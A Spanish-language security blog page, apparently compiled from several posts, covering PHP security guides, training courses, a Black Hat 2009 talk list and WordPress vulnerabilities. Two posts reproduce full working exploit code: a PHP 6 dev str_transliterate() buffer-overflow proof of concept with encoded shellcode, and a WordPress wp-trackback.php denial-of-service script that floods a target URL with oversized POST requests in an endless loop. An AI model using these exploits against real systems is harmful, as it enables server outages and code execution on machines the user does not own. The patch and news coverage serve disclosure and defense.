Gracias a Cristian Borghello me entero que en Devshed.com han publicado una guías paso a paso para asegurar sitios con PHP, las cuales complementan la lista Lista de tareas para revisar la seguridad en proyectos PHP que publicamos en la comunidad hace poco.

Secure PHP Programing y Securing Your PHP Website son un resumen del libro Beginning PHP and Oracle, escrito por W. Jason Gilmore y Bob Bryla y en el que tratan de sobre temas como, la configuración segura de PHP, como asegurar nuestra aplicación en PHP, como validar los datos adecuadamente, entre otras cosas.

Si eres desarrollador web y manejas PHP, te recomiendo que leas estas 2 guias para que mejores la seguridad de tus aplicaciones web.

• Secure PHP Programing
• Securing Your PHP Website

También puede interesarte...

• Curso sobre desarrollo seguro de aplicaciones web por Google
• Buffer Overflow en PHP 6 Dev
• Lista de tareas para revisar la seguridad en proyectos PHP
• Denegacion de Servicio en WordPress
• Clase Virtual Gratuita sobre Desarrollo Web con PHP y Ajax
• Memorias del Black Hat USA 2009
• Charla de Seguridad Web Gratuita – Barcelona España
• Cursos Gratis de Diseño Web en el Sena Virtual

El curso, que es parte del proyecto Google Code University, se basa en el concepto de aplicaciones de tipo Twitter, denominada Jarlsberg, un programa que Google liberó para este fin. Conocido como “Web Application Exploits and Defenses,” desde el cual se da la oportunidad de visualizar el funcionamiento interno de una aplicación insegura, analizar las vulnerabilidades y aprender de los errores de programación que generaron estas fallas.

Ademas de aprender desarrollo, también tendremos una serie de retos que requieren que los estudiantes se esfuercen e identifiquen vulnerabilidades especificas en el código de Jarlsberg. Después de que los estudiantes aprenden los fundamentos de una vulnerabilidad, como CSRF, XSS, se les pide que encuentren una forma de utilizar esta falla para realizar una acción maliciosas especifica en la aplicación, como cambiar algunos detalles en la cuenta de registro de los usuarios sin que ellos se enteren.

Ingresa al Curso de Google sobre Seguridad Web

Más Información:
Anuncio de Hans en la Comunidad

También puede interesarte...

• Presentación de conceptos básicos en Seguridad Web
• Revisa la seguridad de tu sitio web Gratis
• X5S – Encuentra fallos XSS, LFI y RFI fácilmente
• TOP 10 Fallos de Seguridad en Aplicaciones Web
• Multiples Vulnerabilidades en SMF
• Charla de Seguridad Web Gratuita – Barcelona España
• Descargar Gratis Internet Explorer 8 Final
• Cursos Gratis de Diseño Web en el Sena Virtual

El problema se encuentra en la funcion str_transliterate() que permite “traducir” un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada y permite la ejecución de código por medio de un buffer overflow.

Les dejo una PoC que explota esta vulnerabilidad sobre servidor Apache, corriendo en Windows XP SP3 y permite ejecutar la calculadora del sistema:

# Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
# EDB-ID: 12051
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pr0T3cT10n
# Published: 2010-04-04
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

<?php
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, 'unicode.semantics' has to be on!
## php.ini > unicode.semantics = on
#####################################################################
if(ini_get_bool('unicode.semantics')) {
$buff = str_repeat("\u4141", 256);
$eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
$nops = str_repeat("\u9090", 20);

# WinExec Calc XP SP3 HEB Unicode-encoded shellcode
$shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";

# WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
# $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";

$exploit = $buff.$eip.$nops.$shellcode;
str_transliterate(0, $exploit, 0);
} else {
exit("Error! 'unicode.semantics' has be on!\r\n");
}

function ini_get_bool($a) {
$b = ini_get($a);
switch (strtolower($b)) {
case 'on':
case 'yes':
case 'true':
return 'assert.active' !== $a;
case 'stdout':
case 'stderr':
return 'display_errors' === $a;
default:
return (bool) (int) $b;
}
}
?>

Hay que recordar que esta versión de PHP aun esta en desarrollo, pero no deja de ser inquietante este tipo de problemas de carácter critico, en un lenguaje de programación tan extendido en la red, como lo es PHP.

Mas Información:
PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Codigo en exploit-db.com

También puede interesarte...

• Vulnerabilidad 0-day en todas las versiones de Windows
• 0day en Google Chrome
• Memorias del Black Hat USA 2010
• Denegacion de Servicio en WordPress
• Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress
• Cómo descubrir vulnerabilidades y escribir exploits
• Exploit 0day para Internet Explorer en Windows 7
• Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB

Esta pequeña pero útil guía, es la versión imprimible del articulo completo titulado Definitive PHP security checklist donde paso a paso nos dan a conocer los puntos que todo desarrollador web debe tener en cuenta para garantizar la seguridad de sus proyectos.

Esta pequeña lista de tareas, puede servirte de complemento si cuentas con el poster que SektionEins envia de forma gratuita a desarrolladores de toda Europa, una excelente guia de referencia donde se listan las opciones de seguridad del lenguaje PHP.

Si aun no tienes este excelente afiche, puedes solicitarlo gratuitamente en inglés o aleman llenando este formulario, si deseas tenerlo y no estás en la Unión Europea, todavía puedes descargarlo en formato PDF haciendo click en este enlace.

Más Información:
Pagina Oficial del PHP Security Checklist
Pagina Oficial del Poster “PHP Web Security”

También puede interesarte...

• Como realizar un borrado seguro usando BleachBit
• Guía oficial de seguridad en Facebook
• Consejos Simples de Seguridad para ir a la Campus Party
• X5S – Encuentra fallos XSS, LFI y RFI fácilmente
• Video Tutoriales de Wireshark
• Respuesta jurídica frente ataques informáticos
• Curso sobre desarrollo seguro de aplicaciones web por Google
• TOP 10 Fallos de Seguridad en Aplicaciones Web

El bug se encuentra en el archivo wp-trackback.php quien no valida adecuadamente la variable $charset, permitiendo ingresar una peticion POST especialmente diseñada con una cantidad indeterminada de parámetros, causando un  gran consumo de memoria y CPU hasta que estos se agoten y el servidor deja de responder.

Todas las versiones de WordPress hasta el momento son vulnerables a este fallo (y según Jose Carlos, el parche que publicaría WordPress tampoco lo soluciona), aunque dependiendo de la configuración individual de cada servidor, el problema es mayor o menor, por ejemplo un servido con mod_security, no seria vulnerable ya que  bloquearía estas peticiones mal intencionadas,  también se pueden mitigar los daños con una adecuada configuración del parámetro php_memory_limit del php.ini para evitar que tus desarrollos web utilicen mas memoria de la que en realidad necesitan, podrías también utilizar el WP-IDS un mod para WordPress del PHPIDS (reseñado el la guía blanca de seguridad en wordpress WordPress Security Whitepaper) el cual bloquearía no solo estas peticiones sino muchos mas problemas de seguridad.

Les dejo la solución propuesta por Jose Carlos en su blog para este problema:

Reemplazar en la linea 45 del archivo wp-trackback.php esto
$charset = $_POST['charset'];

por esto
$charset = str_replace(”,”,””,$_POST['charset']);
if(is_array($charset)) { exit; }

Y el exploit para verificar que somos vulnerables:

<?php
//wordpress Resource exhaustion Exploit
//http://rooibo.wordpress.com/
//security@wordpress.org contacted and get a response,
//but no solution available.
if(count($argv) < 2) {
echo “You need to specify a url to attack\n”;
exit;
}

$url = $argv[1];

$data = parse_url($url);
if(count($data) < 2) { echo “The url should have http:// in front of it, and should be complete.\n”; exit; } if(count($data) == 2) { $path = ”; } else { $path = $data['path']; } $path = trim($path,’/’); $path .= ‘/wp-trackback.php’; if($path{0} != ‘/’) { $path = ‘/’.$path; } $b = “”; $b = str_pad($b,140000,’ABCEDFG’); $b = utf8_encode($b); $charset = “”; $charset = str_pad($charset,140000,”UTF-8,”); $str = ‘charset=’.urlencode($charset); $str .= ‘&url=www.example.com’; $str .= ‘&title=’.$b; $str .= ‘&blog_name=lol’; $str .= ‘&excerpt=lol’; $count = 0; while(1) { $fp = @fsockopen($data['host'],80); if(!$fp) { if($count > 0) {
echo “down!!!!\n”;
exit;
}
echo “unable to connect to: “.$data['host'].”\n”;
exit;
}

fputs($fp, “POST $path HTTP/1.1\r\n”);
fputs($fp, “Host: “.$data['host'].”\r\n”);
fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);
fputs($fp, “Content-length: “.strlen($str).”\r\n”);
fputs($fp, “Connection: close\r\n\r\n”);
fputs($fp, $str.”\r\n\r\n”);

echo “hit!\n”;
$count++;
}

?>

Para mas informacion:
Agujero de seguridad muy grave en WordPress
Atención! BUG WordPress
WordPress Security Whitepaper

También puede interesarte...

• Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3
• WordPress 2.6.3 vulnerable a Cross Site Scripting
• Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress
• Curso sobre desarrollo seguro de aplicaciones web por Google
• como entrar al facebook de otra persona
• Buffer Overflow en PHP 6 Dev
• Lista de tareas para revisar la seguridad en proyectos PHP
• Pueden leer tu “Basura”

La Fundación UNE realizara hoy jueves 15 de octubre a las 6PM hora colombiana la primera clase virtual gratuita del curso de desarrollo de sitios Web con PHP Y AJAX, La Comunidad DragonJAR te invita a participar desde la comodidad de tu casa u oficina, a esta oportunidad de capacitarte en PHP y AJAX totalmente gratis,  simplemente debes contar con computador, conexión a internet, parlantes y micrófono.

Para participar en esta charla solo es necesario seguir estos simples pasos:

1. Registrarse en el sitio www.fundacionune.com
2. Descargar este manual donde encontrara las indicaciones de cómo conectarse y como participar (no te preocupes por que este realizado desde plataformas windows y se hable sobre activex, la aplicacion webex de cisco, sobra la cual se dictara la charla, tiene soporte para Windows, Mac, Linux, Solaris, HP-UX y AIX OS)
3. Asistir a las 6PM hora colombiana a la url que recibirás por correo.

Esta es una introducción simple a los conceptos de PHP y AJAX, pero tendrás tutores en linea para resolver tus dudas, después de esta charla se realizara un curso pago sobre el tema.

Actualización: El curso gratuito básico ya se llevó a cabo, el jueves 15 de octubre  a las 6PM, si no pudiste verlo o quieres ampliar la informacion expuesta te dejo mas documentación sobre el tema.

• Desarrollo de Aplicaciones Web [JavaScript]
• Desarrollo de Aplicaciones Web [Ajax]
• Manual Desarrollo Web [Php]
• Curso Virtual de PHP en Español

En nuestra comunidad encontraras una sección sobre el lenguaje PHP y una gran cantidad de cursos sobre el, también sobre AJAX y JavaScript.

También puede interesarte...

• Curso sobre desarrollo seguro de aplicaciones web por Google
• Charla de Seguridad Web Gratuita – Barcelona España
• Cursos Gratis de Diseño Web en el Sena Virtual
• Charla sobre Seguridad Web dictada – Jorge Marin
• Aplicaciones Web Vulnerables
• TOP 25 errores más peligrosos en el desarrollo de software
• Presentación de conceptos básicos en Seguridad Web
• Cupos disponibles en el SENA

Se ha liberado la documentación oficial del Blackhat USA, una de las conferencia de seguridad más importantes a nivel mundial, a continuación les dejo los contenidos expuestos en estas conferencias:

= Paper

= Diapositivas de la presentacion

= Video Presentacion

= Codigo Fuente

Alessandro Acquisti

I Just Found 10 Million SSN’s

Dmitri Alperovitch, Keith Mularski

Fighting Russian Cybercrime Mobsters: Report from the Trenches

Andrea Barisani, Daniele Bianco

Sniff Keystrokes With Lasers/Voltmeters

Side Channel Attacks Using Optical Sampling of Mechanical Energy and Power Line Leakage

Marc Bevand

MD5 Chosen-Prefix Collisions on GPUs

Bill Blunden

Anti-Forensics: The Rootkit Connection

Hristo Bojinov, Dan Boneh, Elie Bursztein

Embedded Management Interfaces: Emerging Massive Insecurity

Michael Brooks, David Aslanian

BitTorrent Hacks

Jesse Burns

Exploratory Android Surgery

K. Chen

Reversing and Exploiting an Apple® Firmware Update

Matt Conover

SADE: Injecting Agents into VM Guest OS

Dino Dai Zovi

Advanced Mac OS X Rootkits

Datagram

Lockpicking Forensics

Nitesh Dhanjani

Psychotronica: Exposure, Control, and Deceit

Mark Dowd, Ryan Smith, David Dewey

The Language of Trust: Exploiting Trust Relationships in Active Content

Muhaimin Dzulfakar

Advanced MySQL Exploitation

Michael Eddington

Demystifying Fuzzers

Egypt

Using Guided Missiles in Drive-by’s: Automatic browser fingerprinting and exploitation with Metasploit

Rachel Engel

Gizmo: A Lightweight Open Source Web Proxy

Stefan Esser

State of the Art Post Exploitation in Hardened PHP Environments

Tony Flick

Hacking the Smart Grid

Andrew Fried, Paul Vixie, Dr. Chris Lee

Internet Special Ops: Stalking Badness Through Data Mining

Chris Gates

Breaking the “Unbreakable” Oracle with Metasploit

Travis Goodspeed

A 16 bit Rootkit and Second Generation Zigbee Chips

Joe Grand, Jacob Appelbaum, Chris Tarnovsky

“Smart” Parking Meter Implementations, Globalism, and You

Jennifer Granick

Computer Crime Year In Review: MySpace, MBTA, Boston College and More

Jeremiah Grossman, Trey Ford

Mo’ Money Mo’ Problems: Making A LOT More Money on the Web the Black Hat Way

Peter Guerra

How Economics and Information Security Affects Cyber Crime and What It Means in the Context of a Global Recession

Nathan Hamiel, Shawn Moyer

Weaponizing the Web: More Attacks on User-Generated Content

Nick Harbour

Win at Reversing: Tracing and Sandboxing through Inline Hooking

Riley Hassell

Exploiting Rich Content

Mikko Hypponen

The Conficker Mystery

Vincenzo Iozzo, Charlie Miller

Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone

Dan Kaminsky

Something about Network Security

Peter Kleissner

Stoned Bootkit

Kostya Kortchinsky

Cloudburst: Hacking 3D (and Breaking Out of VMware)

Zane Lackey, Luis Miras

Attacking SMS

Aaron LeMasters, Michael Murphy

Rapid Enterprise Triaging (RETRI): How to Run a Compromised Network and Keep Your Data Safe

Felix “FX” Lindner

Router Exploitation

Kevin Mahaffey, Anthony Lineberry, John Hering

Is Your Phone Pwned? Auditing, Attacking and Defending Mobile Devices

Moxie Marlinspike

More Tricks For Defeating SSL

John McDonald, Chris Valasek

Practical Windows XP/2003 Heap Exploitation

Haroon Meer, Nick Arvanitis, Marco Slaviero

Clobbering the Cloud!

Erez Metula

Managed Code Rootkits: Hooking into the Runtime Environments

Charlie Miller, Collin Mulliner

Fuzzing the Phone in your Phone

David Mortman

A Black Hat Vulnerability Risk Assessment

Graeme Neilson

Netscreen of the Dead: Developing a Trojaned ScreenOS for Juniper Netscreen Appliances

Steve Ocepek

Long-Term Sessions: This Is Why We Can’t Have Nice Things

Jeongwook Oh

Fight Against 1-day Exploits: Diffing Binaries vs Anti-diffing Binaries

Alfredo Ortega, Anibal Sacco

Deactivate the Rootkit

Thomas H. Ptacek, David Goldsmith, Jeremy Rauch

Hacking Capitalism ’09: Vulnerabilities In Markets And Trading Platforms

Danny Quist, Lorie Liebrock

Reverse Engineering By Crayon: Game Changing Hypervisor Based Malware Analysis and Visualization

Tiffany Strauchs Rad, James Arlen

Your Mind: Legal Status, Rights and Securing Yourself

Daniel Raygoza

Automated Malware Similarity Analysis

Peter Silberman, Steve Davis

Metasploit Autopsy: Reconstructing the Crime Scene

Val Smith, Colin Ames, David Kerb

MetaPhish

Mike Zusman, Alexander Sotirov

Breaking the security myths of Extended Validation SSL Certificates

Kevin Stadmeyer, Garrett Held

Worst of the Best of the Best

Bryan Sullivan

Defensive Rewriting: A New Take on XSS/XSRF/Redirect-Phishing Defense

Chris Tarnovsky

What the hell is inside there?

Steve Topletz, Jonathan Logan and Kyle Williams

Global Spying: Realistic Probabilities in Modern Signals Intelligence

Michael Tracy, Chris Rohlf, Eric Monti

Ruby for Pentesters

Dustin “I)ruid” Trammell

Metasploit Telephony

Eduardo Vela Nava, David Lindsay

Our Favorite XSS Filters and How to Attack Them

Mario Vuksan, Tomislav Pericin

Fast & Furious Reverse Engineering with TitanEngine

Chris Weber

Unraveling Unicode: A Bag of Tricks for Bug Hunting

Jeff Williams

Enterprise Java Rootkits

También puede interesarte...

• Antivirus gratis para Mac OS X y GNU Linux
• Soporte para Flash y JAVA en el iPhone / iPod Touch
• Instalar Android en el iPhone o iPod Touch
• Listado de Anti Virus “en la Nube”
• Antivirus para Mac OS X Gratis
• Licencia Gratis del Panda Internet Security
• De independencia, Medios de Comunicación, Twitter y Facebook
• Jailbreak a Cualquier iPhone, iPod Touch e iPad

Las charlas no tienen ningún costo y para asistir únicamente es necesario que los asistentes envíen un correo a “vicente.aguilera@owasp.org” indicando en el asunto del mensaje la palabra “INSCRIPCIÓN”. Solicita el certificado de asistencia y consigue CPEs.

La programación es excelentes, con ponentes reconocidos en el sector de la seguridad web y unas temáticas que no tienen nada que envidiar a un congreso internacional sobre el tema.

PROGRAMACION DEL QUINTO OWASP SPAIN CHAPTER MEETING (BARCELONA)

Los que puedan asistir a este evento, les pido el favor que envien las memorias a dragonjar (at) gmail.com para compartirlas con toda la comunidad.

También puede interesarte...

• Curso sobre desarrollo seguro de aplicaciones web por Google
• Presentación de conceptos básicos en Seguridad Web
• X5S – Encuentra fallos XSS, LFI y RFI fácilmente
• ¿Cómo se realiza un Pentest?
• Memorias del VI OWASP Spain Chapter Meeting
• reDoS – Denegación de Servicios con Expresiones Regulares
• TOP 10 Fallos de Seguridad en Aplicaciones Web
• Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)

El SENA (Servicio Nacional de Aprendizaje), en su página www.senavirtual.edu.co o su plataforma sena sofia plus está implementando nuevos cursos virtuales sobre diseño web, entre las temáticas encontramos lenguajes como HTML, PHP, CSS , JAVASCRIPT, ademas de cursos para manejar los programas mas populares para el diseño  Photoshop, Autocad, Corel Draw, Flash,  Solid Edge, Dreamweaver y FrontPage.

Recordemos que al terminar los cursos en el sena virtual te dan un certificado del sena y entras automáticamente en la bolsa de empleo del SENA donde podrás ser llamado para trabajar en prestigiosas empresas del sector tecnológico del país.

El listado de cursos que puedes realizar en el senavirtual sobre diseño web:

Programación de páginas Web con HTML y JAVASCRIPT
Diseño Web con Macromedia Dreamweaver Mx
Manejo de Adobe Photoshop
Manejo de Herramientas Informáticas: Solid Edge
Autocad 2D
Autocad 3D
Corel Draw – Utilización de herramientas de diseño Vectorial
Corel Draw – Textos y Organización de Objetos
Corel Draw – Transformación de Objetos y Efectos Especiales
Desarrollo y publicación de sitios Web utilizando la herramienta Frontpage
Diseño de Sitios Web, estrategias y usos de herramientas de diseño – Frontpage
Flash – Animacion en 2D

Para acceder a estos cursos gratuitos del SENA solo tienes que entrar al enlace del sena virtual.

También puede interesarte...

• Cupos disponibles en el SENA
• www.senavirtual.edu.co – Cursos virtuales GRATIS en el Sena
• Curso Gratis de Seguridad y Redes en el Sena Virtual
• Curso en el Sena Virtual sobre Auditoria en Seguridad
• cursos de programacion gratuitos en el sena virtual
• Curso Gratuito de Ingles con el Sena Virtual
• Sena Virtual Cursos Gratis de Informática
• SENA Sofia Plus

Ryan Boren fue el encargado  de dar a conocer las 2 vulnerabilidades (SQL Column Truncation y mt_rand()) en el blog oficial de desarrollo de WordPress, el primero fallo, permite manipular las cuentas de usuario, cambiando su contraseña por otra generada “aleatoriamente”, la nueva contraseña no es visible pero aquí es donde pone su grano de arena el otro bug descubierto en la funcion mt_rand() por Boren ya que gracias a este el atacante puede identificar la nueva contraseña generada de forma “aleatoria”.

Ryan nos recuerda que estos agujeros no afectan sólo a WordPress, sino a cualquier programa escrito en PHP, por lo que es aconsejable que actualicen su versión de Suhosin.

Es mas que recomendable que actualices tu versión de WordPress por la 2.6.2 haciendo una actualización completa o descargando solo los archivos modificados de la 2.6.1 a la 2.6.2.

También puede interesarte...

• Curso sobre desarrollo seguro de aplicaciones web por Google
• XSS que permite postear a atacante registrado en WordPress
• Denegacion de Servicio en WordPress
• Reseteo Remoto del Password de Admin en WordPress
• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2
• WordPress 2.6.3 vulnerable a Cross Site Scripting
• Actualiza a WordPress 2.6.5
• Actualiza a WordPress 2.6.3